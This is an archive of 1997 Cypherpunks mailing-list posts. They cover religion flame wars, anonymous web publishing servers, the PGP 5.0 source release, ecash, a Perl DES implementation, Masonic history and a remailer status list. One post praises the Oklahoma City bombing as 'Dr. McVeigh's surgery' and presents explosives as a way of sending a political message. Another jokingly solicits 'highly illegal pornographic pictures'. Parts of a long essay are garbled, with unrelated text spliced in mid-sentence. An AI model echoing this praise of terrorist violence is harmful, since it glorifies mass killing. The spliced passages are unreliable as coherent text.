Message-ID: <199708110147.DAA25245@basement.replay.com>




At 06:16 PM 8/10/97 +1000, you wrote:
>Is it worth noting at this point that an evangilical Christian and the 
>religious right have little in common. Evangelicals (I'm one) belive the 
>Bible to be the word of God etc.. but don't add anythign else to it and 
>certianly wouldn't force thier beliefs down your throat. They would 

Well, most evangelists don't force things down your throat.  They try to convince you to send them money to "Help" The Almighty (TM)'s cause.  Usually, that money is spent on porno mags, hookers, and booze.

>I would also have a problem with Christians controlling and censoring the 
>net. I would welcome (and do welcome) sites that which to argue against 
>Christianity. What wrong with that ?? It simply provides a forum for 
>Christians to defend thier beliefs. Besides if I censor you now because i 
>find your content un acceptable whats to stop you censoring me later when 
>your in the majority ! What utter stupidity to load the gun for others. 
>Particularly as i am a Christian I WOULD be critical of some of the 
>religious rights ideas and agendas and would happily argue from the Bible 
>that they are not a good thing.
>

Too many Christians try to censor atheist site because it defies their Almighty God (TM), and somehow clouds others views.

>I thought school pray was outlawed in the states ?? 

mandatory prayer was.

>> I have known far too many Christians who never read anything that
>> challenges their basic belief structure.  Nothing that could dare shake
>> their faith in God and the Bible.  In their isolation, they are taught to
>> believe ideas that have no rational defense.  (Like Biblical inerrancy and
>> Creationism.)  When challenged, these outcasts from reason have to rely on
>> the "moral authority" of their unseen God or other appeals to authority to
>> try and defend their irrational beliefs.
>
>Christians whould read challenging stuff. IT expands thier mind and 
>strengthens thier beliefs (Well i find it does), and in my expirence a 
>Christian who cant defend thier faith needs to learn more. Although i 
>would disagree with dismissing creationism and Biblical inerrancey. (not 
>that is is an appropriate forum for such a discussion)

Bullshit.  Most Christians I see IRL and on TV cringe at books other than The Good Book(TM).  Creationism is bullshit, God didn't make everything in 7 days, we evolved from monkeys and various others (Although many half-evolved monkeys can be seen on TV Evangelism shows and in Congress).

In order to believe in something, I need some hard facts.  I need to actually see a god (while I'm sober) talk to me and I talk back and see him actually makes things.  Unlike some of the weaker people, I can't just believe it because "anything's possible".  I can't believe it because a minister or a book tells me.  When I was around 8 years, I read this section of the bible asking questions like (it was in the back) "How do we know the bible is true?"  I was intersted, reading further, I noticed some page numbers, so I went there, finding not words of a scientist, but supposed words of god.  If god supposedly asked people to write this, and he says it's true, then that's called bullshit, because that's like someone writing a crypto algorithm, and stating it's secure even though no one else has seen it.

In short, unless I see it for myself, I won't believe it fully.  In religions case, at all.
        






From stewarts at ix.netcom.com  Sun Aug 10 23:22:45 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 11 Aug 1997 14:22:45 +0800
Subject: TAZ & Rewebber servers
In-Reply-To: <199708091606.RAA00914@server.test.net>
Message-ID: <3.0.2.32.19970810230443.00779d84@popd.ix.netcom.com>



>Ian Goldberg and Dave Wagner have a paper on an implementation of
>something related to Ross Anderson's paper at:
>
>	http://www.cs.berkeley.edu/~daw/cs268/

Comments: 
- Nice paper
- I think Lance Cottrell's name is spelled with two "t"s (Footnote 7).
- Also, the anonymizer is now at Infonex.com rather than C2.net.

- The mixture of rewebbers and TAZ servers is interesting;
you can either have http://ENCRYPTED_PATH.taz/document.html
or http://ENCRYPTED_PATH_AND_DOCUMENT_NAME as the URL,
providing different kinds of security.  The former makes it easier
to find stuff, since the documents can have meaningful names,
though //ENCRYPTED_PATH_AND_DOC// can point to //PATH1.TAZ/index.html 
which can point you to the encrypted URLs for document1.html,
document2.html, etc.

- You were awfully nice to the Onion Router folks; my take on their
smaller set of features vs. PipeNet is that they didn't think of  the
other attacks.  On the other hand, they were funded and working on a
project for their jobs, so they did do the work to finish and implement it,
which is of course a Good Thing.

- Elliptic curve flavors of public-key are probably valuable.
Nobody understands them well enough to explain to the non-math-wizard (:-),
but they do appear to use substantially shorter keys and outputs.

- Proxy caching is a mixed blessing.  While caching does increase the
difficulty of traffic analysis by reducing the number of requests that
chain through to the end server, it increases the ability of Bad Guys to
trace through the network using subpoenas, warrants, rubber hoses, or
basic system cracking, because it leaves a trail of cached documents.
Each system still has to be compromised to discover the next link in
the chain, but caching makes it easier to verify that a compromise
has been successful.

- While rewebbers are less likely to be spammed than remailers,
and less likely to annoy users, they're still annoying to the
Powers That Be.  The obvious attacks on the rewebber system are to
post Scientologist Child Porn WareZ on the well-known rewebbers, 
post announcements to Usenet about its availability, and
let the CoS and the Postal Inspectors go after them one by one.





#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From root at cypherpunks.campsite.hip.nl  Sun Aug 10 23:49:40 1997
From: root at cypherpunks.campsite.hip.nl (Charlie Root)
Date: Mon, 11 Aug 1997 14:49:40 +0800
Subject: fyi, pgp source now available internationally
Message-ID: <199708111532.IAA09737@cypherpunks.campsite.hip.nl>




http://cypherpunks.campsite.hip97.nl/pgp/

and

http://www.pgpi.com/






From tm at dev.null  Mon Aug 11 00:09:37 1997
From: tm at dev.null (TruthMailer)
Date: Mon, 11 Aug 1997 15:09:37 +0800
Subject: New Thread? / Re: Apology from me to the list and TruthMonger
Message-ID: <199708110653.AAA21997@wombat.sk.sympatico.ca>



David Downey wrote:
> 
> LOL, all right, all right. I'll take my lickings and like it.

  OK. Now that we've got that settled, what shall we talk about
next, Abortion or Ebonics?

> I do not
> know how to word where I stand because I take a little from each side as
> to what is the correct way to handle these issues. 

  On its face, this is not an unreasonable concept.
  As I see it, the reason for the 'Fuck Compromise' stance being
so heartily proclaimed on the list is not because CypherPunks see
compromise as inherently evil, but because of the recognition that
compromise that is beneficial to both parties requires honesty
and integrity on the part of both parties.
  Compromise at the point of a gun is weakness, not wisdom, and
every step one loses is twice as hard to regain in the future.
The classic example is Hitler, who "only wanted Austria." Then he
"only wanted Poland."
  The government claimed they only wanted to ban the *bad* guns,
but as Tim May pointed out, now it is theoretically illegal in
some places for a citizen to carry a paring knife home from the
store. Of course, in practice, these laws will only be used 
against *bad* people. Mary Tyler Moore has nothing to worry about.

> I believe in fighting for what one believes in. I firmly
> believe in protecting the children and guiding them towards an
> understanding of today's world in *all* it trappings. I am also unsure
> as to the correct and "right" way to do this. I am open to suggestions,
> and am willing to openly contribute my own.

  The fallacy that creates more problems than it solves is that
there *is* a "right" way to do things.
  Life is a crapshoot, and the most we can hope for is to use our
best judgement to minimize whatever ill effects might occur as 
the result of haphazard circumstance.
  Sadly, our society has been moving further and further toward
a fascist, control-freak mentality which dictates that there are
clear lines between right and wrong actions, attitudes and beliefs.
Even more sadly, society is crying out for stiff punishment in
every niggardly aspect of life, including the areas which are
beyond the control of those involved.

  An example is the woman in New York (?) who went to get food for
her baby, and the dog killed/ate the baby while she was gone. The
masses called for her head on a platter and she was charged with
manslaughter (or whatever).
  I am certain that those who could afford a nanny to take care of
their children had enough time on their hands to write a letter to
the editor to call for the woman's imprisonment. I would not be
surprised to find that some of those letters to the editor were
of the opinion that, if the mother had no bread for the baby,
then she should have let the baby "eat cake."
  I couldn't help but think of this poor woman who had lost the
child that she was trying to feed and nurture. Did she need to
be 'punished' because her options were limited by her position
in life? I don't know all the details of her situation, but I
do know that neither the media nor the masses seemed to care
about the details--they just wanted blood.
  I would wager that there are far more children who die in the
company of their mother in a bad neighborhood, than those who
are eaten by the family dog. I would also wager that if the
Clinton's cat killed and ate Chelsea, that there would be no
charges pending.

  Which is the "right" choice--to take your child with you and
have him/her die when you are mugged--to leave your child at
home and have the dog eat him/her?
  Which is the "right" choice--to allow your child to learn about
kinky sex techniques and then die when they try hanging themself
from the ceiling and standing on a chair--to "protect" them from
exposure to *trash* such as this, and then they die by suffocation 
when their sex-partner tells them semi-strangulation enhances
sex, because they've never encountered information about it which
also mentions that it may be dangerous?

  If you beat your child in order to prevent them from doing what
you feel will be harmful to them, then society will put you in jail.
If you beat them psychologically, with guilt, and they kill themself
out of shame when they do something *bad*, society will give you
sympathy.
  Which is the "right" way to teach your children to avoid things
which will harm them? There *isn't* a "right" way.

  Before your child can understand speech, you can't protect them 
from touching a hot stove by "telling" them not to. Is it "wrong"
to slap their hand when they reach for it? Once they *do* know
how to understand what you are telling them, slapping their hand
may not be the best way to keep them from harm.
  The bottom line is that you have to use your best judgment about
issues such as these, and you will never be "right." You will merely
be doing the best that you can. If you don't care about making the
effort to protect your children and they never touch a hot stove,
it does not make you a "good" parent. If you care immensely, and
do everything you are capable of to protect your children and they
*do* touch a hot stove, it does not make you a "bad" parent.

  It is human nature that if you take your child to the park to
enrich their life, and they get killed by a meteor falling from
the sky, you may find yourself "blaming" yourself, saying, "If
only I hadn't taken him/her to the park!"
  This is part of life, and part of being human. However, when
others decide that you should be imprisoned for child endangerment
for taking your child outside when a single astronomer in China 
told the media that a meteorite "might" be on the way, then there
is something seriously wrong with society.
  Is this a ridiculous example? Sure it is...just like someone
claiming that they were justified in raping someone because
their slip was showing, so they were "asking for it."

  The point I am trying to make is that there are no ridiculous
examples. Moose Jaw, Saskatchewan, once had a law that required
pedestrians to walk on the right side of the sidewalk. This was
a fairly recent event.
  Insane? Yes, and City Council eventually figured out that they
were idiots, but if someone's child had died when bumping into
someone while their parent was walking them on the "wrong side"
of the sidewalk, the parent would have been legally guilty of 
child endangerment.

  The "Big Lie" that we tell ourselves is that we can guarantee
our safety and security, and that of our children, if we just
pass enough laws against things that are "wrong." If we can just
figure out who is "to blame" for society's ills and imprison 
them.
  The guy who sold you the "junk bonds" might well have cost
you less money than the long-term government bonds you bought
just before inflation went through the roof. Who is the "right"
person to put in jail, and who is the "wrong" person to put in
jail? Truthfully, the "right" person to put in jail may well
be *you*. It might "protect" you from making bad financial
decisions.

  I don't want your child to get molested by a pedophile. I don't
want your child to die of a heroin overdose. But I don't want a
video camera mounted in my home to monitor my activities in an
attempt to keep your child from coming to harm, either.
  A solution to protecting the citizens is to put them in prison
and keep the criminals on the outside. Really! We would be
protected by the security of concrete walls and locked doors.
  Is the "right" thing to do to put your child in prison?
I think you know better than that.

  Some children are going to be molested, some are going to be
abused and/or murdered, some are going to walk willingly, and
perhaps ignorantly, into bad situations that will lead them to
suffer irrepairable harm.
  I don't want this for your child, or for any child, but I
truly don't believe that they can be protected by making the
lives of everyone so regulated and restricted that our life
energy is drained from us by eroach, and that, while he had
not used any force or pressure in the situation, that it was
possible that this could occur with a smaller child.
  I asked my mother if there was a law against adults offering
children money to let the adult give them a blow-job. She was
startled by my question, though she hid it as best she could,
but she was also amused that I was so casual about asking it.
  She dealt with the situation matter-of-factly, and I went
with a policeman to help him find the man. The policeman
chased him down, subdued him, and took him to jail.

  To tell the truth, I felt compassion for the man, since I
sensed that he was a tortured individual, and he had not really
done anything that 'violated' me, or 'infringed' on my right
to self-determination (although I would not have been able to
verbalize these feelings at the time).
  Looking back on the event, I realize that, strictly speaking,
I did not take a course of action that would lead to his being
judged and punished for what he did, but rather, for what he
"might" do.
  Was I "right" or "wrong" in subjecting someone who did not
do any harm to me to arrest and imprisonment? I don't know.
  It could very well be the man never had, and never would,
force himself on a child, or exert undue pressure on a child
in order to coerce the child into doing something against their
will. Can my actions be deemed "right" or "wrong," depending on
the "odds" of him forcing himself on a child, versus being of
strong enough character not to do evil to satisfy his desires?
  In retrospect, I believe I made my decision to act based on
the fact that I sensed that the man was not totally in control
of basing his actions only on his best rational judgement. It
could be that I had him wrongly imprisoned, or it could be that
I saved him from doing something he would regret for the rest
of his life.

  The irony of this story is that the local police solved their
"problem" with this man by buyingtrolling one's urges versus violating
others in order to satisfy themself?

  The reality of the current state of affairs is that there
are a plethora of laws which prevent parents from making their
own decisions as to how to live their lives and how to raise
their children to the best of their ability.
  If you know that you need to slap your child's hand in order
to keep them from touching a hot stove, will you do so? What
if you also know that Child Services will take away your child
and put them in an orphanage if you do so?
  Is your child better off having a deformed hand and living
at home in a loving environment, or having a normal hand and
being raised by strangers who don't care for him/her?

  Laws aren't going to universally protect our children, nor are
rating systems, or lynchings. Nor, sadly, the best judgement of
concerned, loving parents.
  We can't solve the problems of life by passing legislation that
attempts to control everyone and everything, forcto give his patients marijuana to
relieve their suffering.

  Yes, I care about other people, and I care about children.
I am not selfishly clinging to my rights to privacy and freedom
in order to further my own interests at the expense of others.
I am doing so because I don't believe that the world will be
a better place if my rights and freedoms are taken away.
  Then again, I'm Chinese...I could be "Wong."

TruthMonger






From tm at dev.null  Mon Aug 11 00:10:00 1997
From: tm at dev.null (TruthMailer)
Date: Mon, 11 Aug 1997 15:10:00 +0800
Subject: Dr. McVeigh / Re: A peculiar notion
Message-ID: <199708110653.AAA22003@wombat.sk.sympatico.ca>



David D.W. Downey wrote:
> Steve Schear wrote: 
> > In short, the Constitution itself was a casualty of >Lincoln's war. A Pyrrhic victory indeed.
> >
>         For the first time in a long time, I've read a post that actually make
> me seriously consider rethinking what I have been taught. I've studied
> quite a bit in regards to US law and the Consitution, (made necessary by
> my being Pro-PGP), and never looked in that direction. Your post adds a
> very different light to things.
> Thank you for the push.

  I also thought that it was one of the more thought-provoking posts
in a while, but I would certainly never send a polite, thankful post
to the list, saying so.
  My "CypherPissing" mail folder turned out to be genetically related
to the plant in "Little Shop of Horrors" and, the larger it gets, the
more it demands to be fed. In order to provide it with enough of the
sewage-supplement it needs to keep from eating my "cat" command, I
may have to send a post to the list praising Sandy Sandfort, Chris
Lewis, and blessing Armenians everywhere.
(I have tried remailing old ASCII-art spams to myself, but it refuses
to eat left-overs.)

  (Perhaps I can get my "CypherPissing" folder a few snacks to munch
on, in the meantime, by seeing if praising Tim McVeigh is still good
enough bait to get a few nibbles. "Suckers" taste pretty good, if
you "smoke" 'em.)

  Anyway...
  There are some concepts and arguments that "chip away" at an assumed
belief or a train of logic, and there are those that knock down a load-
bearing support column.
  The Joseph Sobran piece which Steve posted to the list could, with
a proper "primer," do the kind of damage to our view of Civil War
history as the OKC bomb did to the Murrah Federal Building. Come to
think of it, maybe McVeigh _was_ the primer for explosive new views
of why Federalism is quickly becoming indistinguishable from Fascism.
  The advantage that literature has over black powder is that it is
reusable and doesn't leave as big a mess to clean up. The advantage
that black powder has over literature is that it makes enough noise
to get the message to the blind, as well, and sometimes even restores
the sight of the blind. 
{Warning: Since the side-effects of Black Powder can be substantial,
 it should only be used in cases where the physician has determined
 that the benefits of "treatment" outweigh the risks.
 Dr. McVeigh's surgery in OKC falls into the category of private
 research (even if he did receive some government funding). However,
 follow-up research by others may lead to McVeigh's technique being
 improved and perhaps gaining enough recognition to make it standard
 paramedical procedure.}

TruthMonger







From Michael.Johnson at mejl.com  Mon Aug 11 00:39:23 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Mon, 11 Aug 1997 15:39:23 +0800
Subject: Getting ecash without an MTB account
Message-ID: <3.0.3.32.19970811092630.009d5950@localhost>




Suppose I want to give ecash to somebody who don't have an account with
Mark Twain Bank, and I want the receiver of the coins to know that the
coins are genuine.

I would have two accounts at MTB, one for savings and one for transactions.
I want to give away a million bucks, so I deposit that amount in the
transactions account. Then I give the account password to the receiver, he
withdraws the money, and I change the password so he can't get any more
money from me. I trust the receiver not to change my password, but if he
does change it, then I can simply ask MTB to change it back, explaining
that I lost my password.

Would this work?


Mike.






From jeremey at bluemoney.com  Mon Aug 11 01:19:01 1997
From: jeremey at bluemoney.com (Jeremey Barrett)
Date: Mon, 11 Aug 1997 16:19:01 +0800
Subject: Getting ecash without an MTB account
In-Reply-To: <3.0.3.32.19970811092630.009d5950@localhost>
Message-ID: <3.0.2.32.19970811010802.007f77f0@descartes.bluemoney.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 09:26 AM 8/11/97 +0200, Mike wrote:
>
>I would have two accounts at MTB, one for savings and one for transactions.
>I want to give away a million bucks, so I deposit that amount in the
>transactions account. Then I give the account password to the receiver, he
>withdraws the money, and I change the password so he can't get any more
>money from me. I trust the receiver not to change my password, but if he
>does change it, then I can simply ask MTB to change it back, explaining
>that I lost my password.
>
>Would this work?
>

Should work just dandy, with this note: You must destroy your wallet
on disk for the transactions account and recreate after every
"transfer" is complete. This is because the sequence numbers on mint 
messages will not match and the MTB client will complain about it and 
reject the messages. However, you can re-create your wallet with
no problems at all. 

(Note to Digicash developers, if you're reading, please allow any
sequence number greater than or equal to the expected value in future
wallets. There is a really obscure and damned difficult attack that
can be mounted against this, but the alternative is a non-portable
wallet. Not being able to have an arbitrary number of wallets for 
the same account is mucho annoying).

BTW, there are better solutions to operating without a mint account,
but they are not widely available yet.

Regards,
Jeremey.



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM+7IYS/fy+vkqMxNAQHKHQP/WMtgWY5rswZjpNRvk56f0LY/DVe078xC
09Z8DG1dmIZbBCWlTqO5fujZlH83B2S7covw8K3YtVeCF74IlOI5TeOEVVgVZHnp
0/iLafMjEWQBy8/PHxy6IOJeWy0LX2kgJozWTztu6AlcCGvRJx3gRUK14UxMz1mJ
HY3wiupNPfg=
=Laum
-----END PGP SIGNATURE-----

--
Jeremey Barrett                                BlueMoney Software Corp.
Crypto, Ecash, Commerce Systems               http://www.bluemoney.com/
PGP key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64






From jya at pipeline.com  Mon Aug 11 03:53:59 1997
From: jya at pipeline.com (John Young)
Date: Mon, 11 Aug 1997 18:53:59 +0800
Subject: Feds Seek PKI Bids
Message-ID: <1.5.4.32.19970811103643.006f7ec0@pop.pipeline.com>



USG published a solicitation today in the CBD for a
Public Key Infrastructure which outlines the system
requirements:

   http://jya.com/pkicbd.htm






From mark at unicorn.com  Mon Aug 11 03:57:31 1997
From: mark at unicorn.com (Mark Grant)
Date: Mon, 11 Aug 1997 18:57:31 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
Message-ID: 




Charlie Root (root at cypherpunks.campsite.hip.nl) wrote:
>http://cypherpunks.campsite.hip97.nl/pgp/
>and
>http://www.pgpi.com/

(The former no longer seems to work, presumably because the machine is
packed up and on its way home.)

I just wanted to make a few comments on the proofreading, in case anyone
feels like releasing software in a similar manner in future:

The original printed and OCR-ed source gave a single checksum for each
page, with four bits per line. It also ignored whitespace except in
strings and comments. This meant that people could rapidly process the
majority of the code to produce something which wasn't terribly pretty but
functioned correctly. However, because there were only four bits per line
an incorrect line could pass the checksum; this would still be detected
because the checksums were chained, but it could mean that when an error
was detected you had to check several lines to find the invalid one. 

Presumably because of this the OCR-ed pages at HIP included a per-line
checksum. This was good... but... it also checksummed the whitespace. 
This wasn't a problem in theory, because tabs were indicated by a special
character. However, most lines had both tabs *and* spaces and there was no
way to see where the spaces were because they were overrriden by the tab
(e.g. "movax,23; Stuff"). As a consequence
the proofreading went very slowly until some valiant folks (who may or may
not wish to be identified, so I won't) worked overnight to put together a
program to brute-force the checksum by trying all possible combinations of
tabs and spaces until it found the right one. 

So for a future effort could we please have the per-line checksums but
ignore the whitespace unless it's important (e.g. comments and strings
again)? Or if you want to ensure that the whitespace is identical between
versions, please either strip out unneccesary spaces or use a special
character for them so we can see precisely where they are. If all we want
is functioning code, then it doesn't have to look pretty; we can feed it
through a code prettifier like indent when it's functionally correct. 

	Mark






From admin at CyberSpaceTechnologies.com  Mon Aug 11 05:11:52 1997
From: admin at CyberSpaceTechnologies.com (David D.W. Downey)
Date: Mon, 11 Aug 1997 20:11:52 +0800
Subject: Dr. McVeigh / Re: A peculiar notion
In-Reply-To: <199708110653.AAA22003@wombat.sk.sympatico.ca>
Message-ID: <33EF34D9.40F1F8A7@cyberspacetechnologies.com>



Dman, can't someone just tell folks they liked what they read in
whatever manner they choose? Starting to think that no one can do
anything right.






From paulmerrill at acm.org  Mon Aug 11 05:43:05 1997
From: paulmerrill at acm.org (Paul H. Merrill)
Date: Mon, 11 Aug 1997 20:43:05 +0800
Subject: [Fwd: Virus Warning]]
In-Reply-To: <3.0.3.32.19970809051238.006d4908@pop.mhv.net>
Message-ID: <33EF300D.1862@acm.org>



Just as an aside, I received the "virus" in question and it was actually
a poorly written Trojan Horse that I am not sure would work if
initiated.

PHM






From paul at fatmans.demon.co.uk  Mon Aug 11 06:04:58 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Mon, 11 Aug 1997 21:04:58 +0800
Subject: The _Really_ Big Lie!
In-Reply-To: <33EB8A5E.7661@sk.sympatico.ca>
Message-ID: 




> Problem: Little Johnny wants to visit Paul Bradley's "Jesus Loves the
>   Little Children From Behind" web site.
> Solution: Don't let him do that.

What an excellent idea for a new website!!! I`ll get working on the 
forged pictures today, does anyone have any highly illegal pornographic 
pictures involving men in long beards and robes (ie. looking like the 
stereotyped jesus image).

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From aba at dcs.ex.ac.uk  Mon Aug 11 06:14:00 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Mon, 11 Aug 1997 21:14:00 +0800
Subject: Triple-DES blues (was Re: some hashcash advocacy)
In-Reply-To: <19970809223727.64534@bywater.songbird.com>
Message-ID: <199708110756.IAA01879@server.test.net>




Kent Crispin  writes:
> > [btw: Kent: I tried out your .midi file under win95, all I had to do
> > was double click on it.  Almost melodic in an weird modern sort of
> > way.  Most cool anyway :-]
> 
> [...]
> But this experiment sends my mind twitching off in other aesthetic 
> directions -- your code was short enough so that it isn't boring -- 
> if you had 20 minutes of "music" like that it would drive you nuts, 
> and I would like to try some longer things -- a couple hundred lines 
> of C code, for example.  To make that work I was thinking of putting 
> in a strong basic harmonic background, like a blues progression, and 
> using the code text to drive a solo voice over it.  Something like 
> the "Triple-DES blues"...

Well here's DES... shouldn't be hard to construct a 3DES out of it

#!/bin/perl -s-- DES in perl5
$/=" ";sub u{$_=;s/\s//g;map{-33+ord}/./g}$"='';$[=1;@S=map{[u]}1..8;@I=
u;@F=u;@C=(split//,unpack B64,pack H16,$k.0 x16)[u];@D=splice at C,29;@p=u;$_=11 .
2222221 x2;for$l(/./g){map{push@$_,splice@$_,1,$l}\@C,\@D;$K[++$i]="@{[(@C, at D)
[@p]]}"}@E=u;@P=u;%a=map{unpack(B8,chr$_),$_}0..63;while(read STDIN,$b,8){@L=(
split//,unpack B64,$b."\0"x7)[@I];@R=splice at L,33;for$i(1..16){$i=17-$i if$d;@t
=@R[@E];$j=1;$n=0;for(($K[$i]^"@t"|0 x48)=~/.{6}/g){($n<<=4)+=${$S[$j++]}[$a{
"00$_"}+1]};@t=(split//,unpack B32,pack N,$n)[@P];@X=split//,"@L"^"@t"|0 x32;
@L=@R;@R=@X}print pack B64,join'',(@R, at L)[@F]}__END__~printunpacku,'$2F%P:```'
/!%0.("%#/0#,.)"$++''--,&**&!$()%0"-/))#.%'*#",(0&-,*$(/$++!&'!. 0$".)%/('0,#$
)%/*-(!#".+-'!*&,+&!./)(+,"+$%0.%"#&,)'-('-*!$&#/0* +.!(*!/*'$$%0'&+"#.)-&(/,-
%,#0)"."'+%.*!)'0*$)!(,%"0#/-$&,+&/#(- (..)/,$&!''0*!+$"%#()#&-,"-+%/0*+$'0*!!
'-+,"(..)0*"%$&/,&-#()#%/ #/-,%#"-(%+(,.'")&&!$00+.$!*/)*'%,#)"-,(+"./(#).0'*0
-!&*'+$%!&/$ -+"0+%0#*(#-'*)&!'."$.%//!(,&$,)*%/$0#&-#*)&-0$+(,!/%"+("'.!,)'. 
%.,!#,/(0%!*)".+$/-$*&(-&#+0')"'"'%,,..)-"$%(+/(+*0&'!)0!/&#*$#- ."#0).%)'+0$,
("%+-*&$'/,&!!/-*(#(#,"%/"(*%-+/)#.!0'-+*.!0$$&&'), [SKC;3+#]UME=5-%_WOG?7/'aY
QIA91)ZRJB:2*"\TLD<4,$^VNF>6.&`XPH at 80( I)Q1Y9aAH(P0X8`@G'O/W7_?F&N.V6^>E%M-U5]
=D$L,T4\6.&
=5-% /2,9"&$=0'6+84-%;)1(<5.#JU at FPX?ITNBQMRHYCVOKSE>A A"#$%&%&'()*)*+,-.-./012
12345656789:9:;<=>=>?@A" 1(56>-=2"08;&3 at +#)9/A<$*4.?'7,%:


How high can you crank up the bit rate?  How about pgp.exe (270k or so
from pgp263)?

Couldn't you sample voices, and use that through a vocoder?  Say one
line of the music was DES above which would come out as a real short
burst... even pgp.exe at 270k wouldn't be that long at stereo CD
quality sample, right?

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



Mike Duvos  writes:


At 2:00 AM -0700 8/9/97, David D.W. Downey wrote:

>To show how much this country *was* in fact based upon Christianity,
>one has only to look at our money. "In *God* we trust.

That slogan was added only fairly recently - I think in the 30's. The
reverse of the Great Seal (the pyramid) has been on the dollar bill only
since the Roosevelt administration, and was almost unknown to the 
average citizen before that.

> Tim May writes:
> 
> > Actually, _all_ of the Founders were Masons. Tim Bob says check it out.
> 
> Correct.  Thomas Jefferson, Ben Franklin, and others were Deists, and
> Masons, and would have laughed hysterically at the absurd notion of the
> divinity of Jesus Christ.

Nope. While many of the Founders were Masons, by no means all were. 
In particular, there is no evidence that Jefferson was ever a 
member.

Robert Hettinga  writes:

>Well, Unitarians like to claim Jefferson, because of a nice letter he
>wrote to Joseph Priestly. Of course, we like to claim *all* the cool
>people...

The Masons are guilty there too... try reading the entry on 
Freemasonry on Bierce's "The Devil's Dictionary".

John Young wrote:

>Tim May wrote:
>>--Tim May, 34th Degree Mason, former resident of Alexandria, home of
>>the Masonic Temple.

Tim is engaging in his traditional hyperbola here - I can assure you 
that he is NOT 34th degree, and I strongly doubt that he is a Mason 
of any shape or form.

But:

>Now this is modest understatement with regard to this MT, the Godzilla
>of Masonic Temples, worth a side trip from the Capital of the Freeh
>World. You won't believe your eyes at this pyramid scheme putting the
>originals at Giza to shame.

>That over-reaching Alexandria Masonic Temple is matched only by the
>Mormon in Utah and the Buddhist in W.VA and St. Peters and Angor Wat
>and ... Billy Gates' Xanadu.

Aside from a nit (it's not a temple, but rather a memorial: "The 
George Washington Masonic National Memorial" to be exact), this is 
largely correct. It's a really grand, funky piece of architecture, 
and open to the public, with free guided tours. Over 300 feet tall, 
and on the highest point in Alexandria, it has a *very* impressive 
view from the top, taking in all of DC and miles around.

There's a website at http://www.georgewashington.org. It overhypes 
the site's importance to Masonry, but gives you some views of the 
exterior and interior.

If you're in the area with a couple hours to kill, it's definitely
worth a visit (it's only a few minutes from National Airport). 
Don't miss the bookshop/souveneir stand.

Those in the Silicon Valley area might also want to visit the 
Rosicrucian Museum in San Jose, a similarly funky building,
belonging to an unrelated group.

Peter Trei
trei at process.com







From adam at homeport.org  Mon Aug 11 07:04:21 1997
From: adam at homeport.org (Adam Shostack)
Date: Mon, 11 Aug 1997 22:04:21 +0800
Subject: Can't touch this, ugly Americans! (PGP License file)
Message-ID: <199708111344.JAA24033@homeport.org>



First off, congratulations and thanks to Stale and everyone else for
scanning in the source to PGP5.0i (http://www.ifi.uio.no/pgp/)

However, theres an ugly problem with the license.
(http://www.ifi.uio.no/pgp/pgp50i-license.txt)

In Section 1.c.(d), permission is given to port PGP to other
platforms.  However, permission to distribute those ports is
explicitly denied.

Could the license be modified to allow people who port the software to
redisctribute ports?  There is enough FUD about using PGP without PGP,
Inc contributing to that by overly tight licensing.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From raph at CS.Berkeley.EDU  Mon Aug 11 07:15:32 1997
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 11 Aug 1997 22:15:32 +0800
Subject: List of reliable remailers
Message-ID: <199708111350.GAA26919@kiwi.cs.berkeley.edu>



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list at kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list at kiwi.cs.berkeley.edu.

$remailer{'cyber'} = ' alpha pgp';
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = " cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = " cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = ' newnym pgp';
$remailer{"squirrel"} = " cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = ' newnym pgp';
$remailer{"reno"} = " cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = " cpunk mix remix pgp hash esub latent cut ek reord";
$remailer{'redneck'} = ' newnym pgp';
$remailer{"bureau42"} = " cpunk mix pgp hash latent cut ek";
$remailer{"neva"} = " cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = " mix";
$remailer{"medusa"} = " mix middle"
$remailer{"McCain"} = " mix middle";
$remailer{"valdeez"} = " cpunk pgp pgponly hash ek";
$remailer{"arrid"} = " cpunk pgp pgponly hash ek";
$remailer{"hera"} = " cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = " cpunk pgp hash latent cut post ek";
catalyst at netcom.com is _not_ a remailer.
